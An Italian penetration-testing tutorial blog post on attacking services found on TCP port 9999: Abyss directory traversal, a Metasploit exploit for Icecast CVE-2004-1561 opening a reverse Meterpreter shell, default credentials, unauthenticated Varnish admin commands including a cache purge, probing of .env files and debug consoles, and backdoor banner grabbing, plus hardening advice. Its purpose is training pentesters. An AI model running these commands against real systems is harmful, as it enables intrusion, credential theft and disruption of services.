networking

Porta 9999 Pentest: Abyss, Icecast CVE-2004-1561 e Dev Server

Porta 9999 Pentest: Abyss, Icecast CVE-2004-1561 e Dev Server

Porta 9999: Abyss Web Server directory traversal e admin bypass, Icecast buffer overflow RCE CVE-2004-1561, Varnish admin esposto, staging server senza protezioni e backdoor detection.

  • Pubblicato il 2026-04-18
  • Tempo di lettura: 4 min

La porta 9999 TCP è una di quelle porte “psicologiche”: facile da ricordare, fuori dal range delle porte note, perfetta per un test rapido. Ed è esattamente così che viene usata — come porta temporanea per servizi di sviluppo, debug, admin panel e qualsiasi cosa lo sviluppatore volesse tenere “separata”. I servizi più comuni sulla 9999 sono: Abyss Web Server (un web server leggero per Windows), Icecast (server di streaming audio), Varnish admin (cache HTTP), applicazioni di test/staging, e — il caso più preoccupante — backdoor e trojan che usano la 9999 proprio perché è una porta “innocua” non monitorata.

Nel penetration testing, la 9999 è una porta da testare sempre quando fai una scansione completa. Non è tra le top 1000 di Nmap (quindi lo scan veloce la salta), ma nasconde sorprese. Un’applicazione di staging sulla 9999 spesso è una copia dell’applicazione di produzione con: credenziali di default, debug mode attivo, dati reali e nessuna protezione.

1. Identificare il Servizio #

bash
# La 9999 non è nelle top 1000 — specificala
nmap -sV -p 9999 10.10.10.40
bash
curl -s http://10.10.10.40:9999/ -I
curl -s http://10.10.10.40:9999/ | head -80
IndicatoreServizioProssimo step
Server: AbyssAbyss Web ServerDefault creds + CVE
Server: IcecastIcecastCVE-2004-1561 buffer overflow
HTML con “Varnish” o Via: varnishVarnish Cache adminConfigurazione backend
JSON API o HTML genericoApp di sviluppo/stagingTratta come porta 8000
Server: Python, Werkzeug, ExpressDev serverDebug mode, credenziali
Connessione binaria/sconosciutaPossibile backdoorAnalisi traffico
HTML con “AAAA” o pagina di testApp in sviluppoDirectory brute + parametri

2. Abyss Web Server #

Abyss è un web server gratuito e compatto, popolare su Windows per hosting locale, server web personali e ambienti di test. Sviluppato da Aprelium, supporta PHP, Perl, CGI.

Enumerazione #

bash
curl -s http://10.10.10.40:9999/ -I
text
Server: Abyss/2.16.0.2-X2

Console di amministrazione #

Abyss ha una console web di gestione, tipicamente sulla stessa porta o sulla porta 9999 con path /admin/:

bash
curl -s http://10.10.10.40:9999/admin/ -I

Default credentials #

UsernamePasswordNote
(nessuno)(nessuna)Nessuna password di default — spesso non configurata
adminadminSe configurato
admin(vuota)Setup rapido

Se la console admin è accessibile senza password → configurazione del web server esposta (path dei file, CGI config, virtual host).

CVE Abyss #

bash
searchsploit abyss
text
Abyss Web Server 1.x - Directory Traversal
Abyss Web Server 2.x - Denial of Service
Abyss Web Server - HTTP Request Smuggling

Directory traversal:

bash
curl -s "http://10.10.10.40:9999/..%5c..%5c..%5c..%5c/windows/system32/drivers/etc/hosts"
curl -s "http://10.10.10.40:9999/..%2f..%2f..%2f..%2f/etc/passwd"

3. Icecast — Streaming Audio Server #

Icecast è il server di streaming audio open source più usato — alimenta web radio e podcast live. Se lo trovi sulla 9999 (porta alternativa; la default è 8000):

Enumerazione #

bash
curl -s http://10.10.10.40:9999/ -I
text
Server: Icecast 2.4.0

CVE-2004-1561 — Buffer Overflow RCE #

Il CVE classico di Icecast — un buffer overflow nell’header HTTP che dà RCE:

bash
# Metasploit
use exploit/windows/http/icecast_header
set RHOSTS 10.10.10.40
set RPORT 9999
set LHOST 10.10.10.200
run
text
[*] Started reverse TCP handler on 10.10.10.200:4444
[*] Sending request...
[*] Meterpreter session 1 opened
meterpreter > getuid
Server username: ICECAST\admin

Questa è la macchina Icecast di HackTheBox — un classico della formazione OSCP. L’exploit è vecchio (2004) ma Icecast non viene aggiornato spesso.

Default credentials Icecast #

bash
# Admin panel
curl -s -u admin:hackme http://10.10.10.40:9999/admin/
curl -s -u source:hackme http://10.10.10.40:9999/admin/
UsernamePasswordFunzione
adminhackmeAdmin panel (default)
sourcehackmeSource client

4. Varnish Cache Admin #

Varnish è un acceleratore HTTP (reverse proxy cache). L’interfaccia admin ascolta spesso sulla 9999 (o 6082).

bash
# Varnish CLI
varnishadm -T 10.10.10.40:9999

Se non richiede secret (autenticazione):

bash
# Mostra configurazione backend (server dietro la cache)
varnishadm -T 10.10.10.40:9999 backend.list
text
Backend name  Admin   Probe   Health
boot.default  probe   5/5     healthy
webapp        probe   5/5     healthy
bash
# Mostra la VCL (Varnish Configuration Language) — rivela backend con IP e porte
varnishadm -T 10.10.10.40:9999 vcl.show -v boot
text
backend webapp {
    .host = "10.10.10.50";
    .port = "8080";
}

IP e porta del server applicativo interno → nuovo target.

bash
# Purga la cache (DoS/disruption)
varnishadm -T 10.10.10.40:9999 "ban req.url ~ ."

5. Servizi di Sviluppo e Staging #

Se sulla 9999 trovi un’applicazione web generica → è quasi certamente un ambiente di sviluppo o staging. Trattala come la porta 8000 con priorità extra perché:

  • Debug mode probabilmente attivo (Django DEBUG=True, Flask /console, PHP display_errors)
  • Credenziali di default non cambiate
  • Dati reali copiati dalla produzione per i test
  • Nessun WAF, rate limiting o monitoring
bash
# Verifica debug mode
curl -s http://10.10.10.40:9999/nonexistent_page_xyz  # Django debug
curl -s http://10.10.10.40:9999/console                # Flask Werkzeug
curl -s http://10.10.10.40:9999/.env                    # Environment variables
curl -s http://10.10.10.40:9999/phpinfo.php             # PHP info

# Directory brute
gobuster dir -u http://10.10.10.40:9999 -w /usr/share/wordlists/dirb/common.txt -x php,py,js,html,json -t 30

6. Backdoor Detection #

La porta 9999 è usata da diversi trojan e backdoor storiche:

MalwarePortaNote
Backdoor.Optix9999RAT Windows
NetBus Pro9999RAT classico anni 2000
Various RAT9999Porta generica per C2 custom

Se la 9999 è aperta e non corrisponde a nessun servizio noto:

bash
# Cattura il banner
nc -nv 10.10.10.40 9999
# Invia dati e osserva la risposta
echo "HELP" | nc -w 3 10.10.10.40 9999
echo "VERSION" | nc -w 3 10.10.10.40 9999

Se il servizio risponde con prompt sconosciuti o accetta comandi → possibile backdoor. Questo è un finding critico: la macchina potrebbe essere già compromessa da qualcun altro.

7. Detection & Hardening #

  • Chiudi le porte di sviluppo — se il servizio non serve in produzione, la porta va chiusa
  • Non usare 9999 come “porta di test” — se devi testare, usa localhost
  • Firewall — la 9999 non deve essere raggiungibile dall’esterno
  • Monitora porte non standard con scansioni periodiche
  • Se è Icecast: aggiorna (il CVE del 2004 è ancora sfruttabile)
  • Se è Varnish: configura il secret per l’admin CLI
  • Se è un RAT: isola la macchina, incident response

8. Cheat Sheet Finale #

AzioneComando
Nmapnmap -sV -p 9999 target
Bannercurl -s http://target:9999/ -I
Netcatnc -nv target 9999
Abyss
Admincurl http://target:9999/admin/
Dir traversalcurl "http://target:9999/..%5c..%5c..%5c/etc/passwd"
Icecast
MSF exploituse exploit/windows/http/icecast_header
Default credsadmin:hackme
Varnish
CLIvarnishadm -T target:9999
Backendsbackend.list + vcl.show -v boot
Dev/staging
Debugcurl http://target:9999/console o /nonexistent/
.envcurl http://target:9999/.env
Gobustergobuster dir -u http://target:9999 -w wordlist
Searchsploitsearchsploit abyss icecast

Riferimento: Abyss Web Server docs, CVE-2004-1561, Varnish admin docs, HackTricks. Uso esclusivo in ambienti autorizzati.

La tua rete ha porte non standard aperte che non conosci? Il penetration test HackIta scansiona tutto — non solo le porte note. Per diventare un pentester completo: formazione 1:1 su misura.

#porta-9999 #abyss-web-server-pentest #dev-staging-exploitation #icecast-cve-2004-1561

DIVENTA PARTE DELL’ÉLITE DELL’HACKING ETICO.

Accedi a risorse avanzate, lab esclusivi e strategie usate dai veri professionisti della cybersecurity.

Non sono un robot

Iscrivendoti accetti di ricevere la newsletter di HACKITA. Ti puoi disiscrivere in qualsiasi momento.